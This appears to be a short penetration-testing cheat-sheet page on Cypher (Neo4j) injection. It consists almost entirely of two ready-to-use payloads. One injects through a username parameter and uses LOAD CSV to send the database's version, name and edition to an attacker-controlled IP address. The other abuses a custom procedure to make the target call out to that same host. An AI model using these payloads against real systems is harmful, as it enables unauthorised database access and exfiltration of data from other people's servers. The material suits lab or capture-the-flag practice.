Cypher Injection

  • Refer this article for exploiting the cypher injection

  • using the below payload to confirm the cypher injection in the username parameter

' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.49/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //

  • Let’s use below payload to get the hit on our machine (getUrlStatusCode because the webpage/code is checking for status code)

' return h.value as a UNION CALL custom.getUrlStatusCode('http://10.10.14.49:80') YIELD statusCode AS a RETURN a;//

PreviousNiktoNextMSSQL

Last updated